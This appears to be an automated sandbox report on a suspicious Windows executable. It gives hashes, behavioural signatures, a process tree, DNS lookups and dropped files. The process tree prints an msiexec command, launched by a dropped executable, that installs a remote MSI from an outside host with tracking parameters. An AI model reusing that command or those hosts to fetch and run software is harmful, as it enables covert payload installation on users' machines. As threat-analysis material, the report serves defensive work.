dbdaf1a65d775f6913c8ec9c2c49ebdd87b3b913edb7529d7c4bc4aca11aa47e

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
06/07/2024, 06:14 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe
Size

1.4MB
MD5

2784fb6d81216553213b3aa03a6eb06f
SHA1

1688f0606b9c0c81946e820033a31722a148d352
SHA256

dbdaf1a65d775f6913c8ec9c2c49ebdd87b3b913edb7529d7c4bc4aca11aa47e
SHA512

f3c7a507fa711b69087389fdef1f96f06eead9dcc18d4679df43fd560d943bbc6d17dec66ec804679ef7bf9056a19c66a323f86569240134e6c2c3ca7d925645
SSDEEP

24576:Enn/S5jnARqPoKCoL+4rBKBftXWxEA+7Nq2WNpmbEdOvBYl2mj0yQnhrcufW:0S9nARyf+4yXwEAQNq9pmbEYZGfQychA

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2468	x9Xfwi.exe

Loads dropped DLL 3 IoCs

pid	Process
2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe
2468	x9Xfwi.exe
2468	x9Xfwi.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
1492	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1492	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	1492	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1492	MSIEXEC.EXE
1492	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2108 wrote to memory of 2468	2108	2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe	30
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31
PID 2468 wrote to memory of 1492	2468	x9Xfwi.exe	31

C:\Users\Admin\AppData\Local\Temp\2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2784fb6d81216553213b3aa03a6eb06f_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\x9Xfwi.exe
  "C:\Users\Admin\AppData\Local\Temp\x9Xfwi.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://download.cdnpackages.eu/36175/cdn/99slot/99 Slot Machine20120417103607.msi" DDC_DID=1026351 DDC_RTGURL=http://www.dlhsetup.eu/dl/TrackSetup/TrackSetup.aspx?DID=1026351 DDC_UPDATESTATUSURL=http://190.4.88.51:8080/99slotmachine/Lobby.WebServices/Installer.asmx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="x9Xfwi.exe"
    3⤵
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:1492

Network

DNS

download.cdnpackages.eu

MSIEXEC.EXE

Remote address:

8.8.8.8:53

Request

download.cdnpackages.eu

IN A

Response

No results found

8.8.8.8:53

download.cdnpackages.eu

dns

MSIEXEC.EXE

69 B
69 B
1
1

DNS Request

download.cdnpackages.eu

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is87AC.tmp

Filesize
1KB

MD5
e6b794c9d19995a62ca398b2668ec0ee

SHA1
646a119c22621818949d6f0c6cde362a305b1eff

SHA256
9f64723cc13951ce2413694a701560cb9ac371be33c398f513fce5e91bd64b31

SHA512
cf997442d2424e197d524529473f6924654d163f689104a53100f3a1721a2cceea33c44c96a897d86c4c1690069176aff56766ef8f41ca3318ca0c55173603ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AA777E56-C335-4875-B840-50776CF57D1C}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AA777E56-C335-4875-B840-50776CF57D1C}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~8799.tmp

Filesize
5KB

MD5
b6bec071b600aecfa9a273a5772e4a5e

SHA1
004e1ef817823715b9fa179834a3db5a610176a3

SHA256
b41192d8a94b4db13e9e2a92acb6337ed7a37d5bc7562d6286951966a09db4bf

SHA512
528561cf2a1655fcbb8942c91e2c5cce44a9d1a14440820a28df31122dc66ef0215369631c3239f17d059cd5e744fd3e9a0cf94bd07575669d72fee23e8f343a

Download Submit
\Users\Admin\AppData\Local\Temp\x9Xfwi.exe

Filesize
1.1MB

MD5
0a8b141b5cb3c74eb7f9db383125bc1a

SHA1
cf6482db72907c3c4f43ac1b6a0669c9121c408a

SHA256
2a484c061088a31f89c87b6c64967d8d3d2ed5a1bcf584e49bf645b1bdb65c11

SHA512
e3d7300e05c4e34b4d82f81a4f48ce09061363769a074eb12b2aa0a8cc2c21d5026a2f1b6faef27e80075edc3c35e8d77f5f8bd36cf307f143b3f878b5e044fa

Download Submit